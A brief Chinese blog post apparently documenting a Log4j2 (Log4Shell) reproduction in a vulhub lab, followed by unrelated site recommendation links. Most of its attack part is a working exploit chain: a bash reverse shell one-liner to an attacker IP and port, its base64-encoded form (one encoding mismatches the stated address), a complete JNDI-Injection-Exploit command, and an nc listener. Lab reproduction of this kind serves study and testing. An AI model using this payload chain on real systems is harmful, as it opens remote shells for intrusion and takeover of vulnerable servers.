vulhub靶场log4j2漏洞复现

嘤嘤奶嘴酱2024-09-09 1:38

开启环境

进入主页

在DNSLOG平台上获取⼀个域名来监控注⼊

开始反弹Shell,下载一个JNDI-Injection-Explo到攻击机

bash -i >& /dev/tcp/192.168.10.233/8888 0>&1

反弹base64加密

YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMy82NjY2IDA+JjE=

最终payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzMy84ODg4IDA+JjE=

}|{base64,-d}|{bash, -i}" -A "192.168.10.233"

监听nc -lvvp 8888

使用jdk1.8的payload直接访问

相关推荐
木子欢儿2 小时前
Debian系统清理垃圾
linux·运维·服务器·debian
翻滚吧键盘2 小时前
查看debian的版本信息
运维·chrome·debian
Blockchina2 小时前
Python自动化脚本:2分钟快速搭建MTProto代理服务(支持多端口负载均衡)
运维·自动化·代理模式
字节源流2 小时前
【SpringMVC】常用注解:@SessionAttributes
java·服务器·前端
谷晓光3 小时前
python中print函数的flush如何使用
linux·服务器·数据库
点PY3 小时前
构建rknn的docker镜像
运维·docker·容器
AdrichPro3 小时前
4、linux c 进程
linux·运维·服务器·c语言
技术流Garen3 小时前
如何配置 Docker 以实现无需 sudo 使用
运维·docker
桂月二二4 小时前
云原生可观测性:智能运维的数据中枢
运维·云原生
x132572729265 小时前
AI 直播盈利全攻略:借助智能技术实现收入自动化增长
运维·人工智能·自动化
热门推荐
01本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程02如何在WPS和Word/Excel中直接使用DeepSeek功能03DeepSeek各版本说明与优缺点分析04从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑05DeepSeek RAGFlow构建本地知识库系统06本地部署DeepSeek教程(Mac版本)07命令行方式将mysql数据库迁移到达梦数据库(全步骤)08如何本地部署AI智能体平台,带你手搓一个AI Agent09DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具10rv1126交叉编译opencv+ffmpeg+x264